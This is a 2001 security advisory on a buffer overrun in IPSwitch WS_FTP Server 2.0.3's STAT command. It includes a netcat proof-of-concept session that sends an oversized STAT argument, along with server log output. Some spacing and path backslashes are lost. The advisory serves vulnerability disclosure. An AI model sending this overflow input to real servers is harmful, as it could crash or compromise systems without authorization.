Unchecked Buffer in IPSwitch WS_FTP
A vulnerability exists in IPSwitch’s WS_FTP Server 2.0.3 that lets a potential remote attacker gain system-level access to servers running the FTP daemon.
November 5, 2001
Reported November 5, 2001, by DefcomLabs.
VERSION AFFECTED
IPSwitch WS_FTP FTP Server 2.0.3 for Windows XP, Windows 2000, and Windows NT
DESCRIPTION
Avulnerability exists in IPSwitch’s WS_FTP Server 2.0.3 that lets a potentialremote attacker gain system-level access to servers running the FTP daemon. Thisvulnerability results from buffer overrun condition in the parsing code used toprocess the stat command. Sending a stat command to the vulnerable server withan argument greater than 479 bytes triggers the overflow.
DEMONSTRATION
Defcom Labs provided the following demonstration asproof-of-concept:
C:toolsweb>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to127.0.0.1:21
SetFolder = C:programiFtpSvchelig
SetFolder = C:programiFtpSvcheligpublic
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logonsuccess